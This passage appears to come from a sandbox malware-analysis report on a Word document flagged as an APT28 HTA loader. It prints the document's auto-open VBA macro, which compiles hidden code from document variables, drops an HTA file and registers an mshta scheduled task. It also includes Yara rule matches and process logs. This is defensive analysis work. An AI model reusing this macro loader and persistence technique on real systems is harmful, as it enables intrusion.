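SAMPLE_HTA = b'<html><script language="VBScript">Set s = CreateObject("WScript.Shell")</script></html>'
SAMPLE_VARIABLES = [
    SAMPLE_HTA[:30].hex(),
    SAMPLE_HTA[30:].hex().upper(),
    "Sub goods(): End Sub",           # stands in for block1ergegdr
    "Sub baads(): End Sub",           # stands in for block2ergegdr
    "Sub docUment_oPen(): End Sub",   # third trailing variable the macro skips
]

if __name__ == "__main__":
    rebuilt = reconstruct_payload(SAMPLE_VARIABLES)
    print(rebuilt.decode())
    print("looks like an HTA:", looks_like_hta(rebuilt))
```

The rebuilt bytes are what the report lists as C:\Users\user\AppData\Local\Settings\locale and what the Sekoia.io HTA loader rule matches on, so the decoder output can be scanned with the same Yara rule before any dynamic analysis.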
Source: VBA code instrumentation; OLE, VBA macro: Module ThisDocument, Function documeNt_opEn, String ThisDocument
Source: Rev5_ Joint Declaration C5 GER_track changes.doc; Stream path 'VBA/ThisDocument': found possibly 'WScript.Shell' functions environment, expandenvironmentstrings, regwrite, run, environ
Source: ~WRD0000.tmp.0.dr; Stream path 'VBA/ThisDocument': found possibly 'WScript.Shell' functions environment, expandenvironmentstrings, regwrite, run, environ
Source: ~WRD0001.tmp.7.dr; Stream path 'VBA/ThisDocument': found possibly 'WScript.Shell' functions environment, expandenvironmentstrings, environ
Source: Rev5_ Joint Declaration C5 GER_track changes.doc; OLE, VBA macro line: Sub documeNt_opEn()
Source: VBA code instrumentation; OLE, VBA macro: Module ThisDocument, Function documeNt_opEn; Name: documeNt_opEn
Source: ~WRD0000.tmp.0.dr; OLE, VBA macro lines (the JbxHook_*/jbxtresh_*/JbxLogParam names are Joe Sandbox's VBA instrumentation wrappers written into this copy of the document, not the sample's own code; the wrapped call, jbxthis.Open(jbxparam0) with jbxthis = objApp.Documents, is the sample's objApp.Documents.Open(namedoc), i.e. the first-stage macro opens a second document):
    Private Function JbxHook_Open_1__ob_set(jbxline, ByRef jbxthis, ByRef jbxparam0)
    Static jbxtresh_Open As Integer
    If jbxtresh_Open < 200 Then
    Set JbxHook_Open_1__ob_set = jbxthis.Open(jbxparam0)
    If jbxtresh_Open < 200 Then
    jbxtresh_Open = jbxtresh_Open + 1
    JbxLogParam "jbxreturn", JbxHook_Open_1__ob_set
    Set doc2 = JbxHook_Open_1__ob_set(14, objApp.Documents, namedoc)
Source: ~WRD0000.tmp.0.dr; OLE, VBA macro line: Sub documeNt_opEn()
Source: ~WRD0000.tmp.7.dr and ~WRD0001.tmp.7.dr; OLE, VBA macro line (reflowed from the colon-joined one-liner):
    Sub docUment_oPen()
        ' Compile the goods/baads source held in two document variables into ThisDocument at run time.
        ' This needs "Trust access to the VBA project object model" (AccessVBOM); without it the
        ' VBProject access raises an error and, with no On Error handler here, nothing else runs.
        ActiveDocument.VBProject.VBComponents(1).CodeModule.AddFromString ActiveDocument.Variables.Item("block1ergegdr")
        ActiveDocument.VBProject.VBComponents(1).CodeModule.AddFromString ActiveDocument.Variables.Item("block2ergegdr")
        goods        ' drop %LOCALAPPDATA%\Settings\locale
        baads        ' register the mshta.exe scheduled task
        Me.Close
    End Sub
Source: Rev5_ Joint Declaration C5 GER_track changes.doc; OLE indicator, VBA macros: true
Source: ~WRD0000.tmp.0.dr; OLE indicator, VBA macros: true
Source: ~WRD0000.tmp.7.dr; OLE indicator, VBA macros: true
Source: ~WRD0001.tmp.7.dr; OLE indicator, VBA macros: true
Source: C:\Windows\System32\mshta.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: settings.xml, type: SAMPLE; Matched rule: apt_susp_apt28_uac0063_malicious_doc_settings_xml author = Sekoia.io, description = Detects some suspected APT28 document settings.xml, creation_date = 2024-07-25, classification = TLP:CLEAR, version = 1.0, id = fd104985-6441-4fb6-8cc1-30afa4a7797b, hash = 0272acc6ed17c72320e4e7b0f5d449841d0ccab4ea89f48fd69d0a292cc5d39a
Source: 00000009.00000002.2963111692.00000230803F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: apt_susp_apt28_uac0063_hta_loader author = Sekoia.io, description = Detects some suspected APT28 HTA loader, creation_date = 2024-07-25, classification = TLP:CLEAR, version = 1.0, id = 8e1889c1-c6ac-4048-9d3a-99ccbbd5435f, hash = 332d9db35daa83c5ad226b9bf50e992713bc6a69c9ecd52a1223b81e992bc725
Source: Process Memory Space: mshta.exe PID: 1460, type: MEMORYSTR; Matched rule: apt_susp_apt28_uac0063_hta_loader author = Sekoia.io, description = Detects some suspected APT28 HTA loader, creation_date = 2024-07-25, classification = TLP:CLEAR, version = 1.0, id = 8e1889c1-c6ac-4048-9d3a-99ccbbd5435f, hash = 332d9db35daa83c5ad226b9bf50e992713bc6a69c9ecd52a1223b81e992bc725
Source: C:\Users\user\AppData\Local\Settings\locale, type: DROPPED; Matched rule: apt_susp_apt28_uac0063_hta_loader author = Sekoia.io, description = Detects some suspected APT28 HTA loader, creation_date = 2024-07-25, classification = TLP:CLEAR, version = 1.0, id = 8e1889c1-c6ac-4048-9d3a-99ccbbd5435f, hash = 332d9db35daa83c5ad226b9bf50e992713bc6a69c9ecd52a1223b81e992bc725
Source: classification engine; Classification label: mal92.expl.evad.winDOC@5/14@2/2
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE; File created: C:\Users\user\Desktop\~$v5_ Joint Declaration C5 GER_track changes.doc
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Temp\{82C13F39-4118-470A-A2BC-806DFFCD0D1D} - OProcSessId.dat
Source: Rev5_ Joint Declaration C5 GER_track changes.doc; OLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.0.dr; OLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.7.dr; OLE indicator, Word Document stream: true
Source: ~WRD0001.tmp.7.dr; OLE indicator, Word Document stream: true
Source: Rev5_ Joint Declaration C5 GER_track changes.doc; OLE document summary: title field not present or empty
Source: Rev5_ Joint Declaration C5 GER_track changes.doc; OLE document summary: author field not present or empty
Source: Rev5_ Joint Declaration C5 GER_track changes.doc; OLE document summary: edited time not present or 0
Source: ~WRD0000.tmp.0.dr; OLE document summary: title field not present or empty
Source: ~WRD0000.tmp.0.dr; OLE document summary: author field not present or empty
Source: ~WRD0000.tmp.0.dr; OLE document summary: edited time not present or 0
Source: ~WRD0000.tmp.7.dr; OLE document summary: title field not present or empty
Source: ~WRD0000.tmp.7.dr; OLE document summary: edited time not present or 0
Source: ~WRD0001.tmp.7.dr; OLE document summary: title field not present or empty
Source: ~WRD0001.tmp.7.dr; OLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE; File read: C:\Users\desktop.ini
Source: C:\Windows\System32\mshta.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers (Software Restriction Policy check by the script host)
Source: Rev5_ Joint Declaration C5 GER_track changes.doc; ReversingLabs: Detection: 34%
Source: Rev5_ Joint Declaration C5 GER_track changes.doc; Virustotal: Detection: 42%
Source: unknown; Process created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: unknown; Process created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: unknown; Process created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\user\AppData\Local\Settings\locale (the scheduled task's action; mshta.exe is not a child of WINWORD.EXE, so parent/child process rules do not catch it)
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE; Process created: unknown unknown
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE; Process created: unknown unknown
Source: C:\Windows\System32\mshta.exe; Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: virtdisk.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: directxdatabasehelper.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: cryptbase.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: textshaping.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: vbscript.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: amsi.dll (the script engine's AMSI integration: the decoded script content is exposed to any registered AMSI provider)
Source: C:\Windows\System32\mshta.exe; Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: scrrun.dll (Scripting runtime: FileSystemObject and Dictionary)
Source: C:\Windows\System32\mshta.exe; Section loaded: msxml3.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: wininet.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: iphlpapi.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: mswsock.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: mlang.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: winnsi.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: ieframe.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: dnsapi.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: rasadhlp.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: msasn1.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: gpapi.dll
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32 (the Scripting.FileSystemObject CLSID, i.e. the CreateObject in goods())
Source: C:\Windows\System32\mshta.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE; Window found: window name: SysTabControl32
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: Rev5_ Joint Declaration C5 GER_track changes.doc; Initial sample: OLE zip file path = word/comments.xml
Source: Rev5_ Joint Declaration C5 GER_track changes.doc; Initial sample: OLE zip file path = word/commentsExtended.xml
Source: ~WRD0000.tmp.0.dr; Initial sample: OLE zip file path = word/comments.xml
Source: ~WRD0000.tmp.0.dr; Initial sample: OLE zip file path = word/commentsExtended.xml
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE; File opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dll
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE; Process information set: NOOPENFILEERRORBOX (60 identical entries collapsed)
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
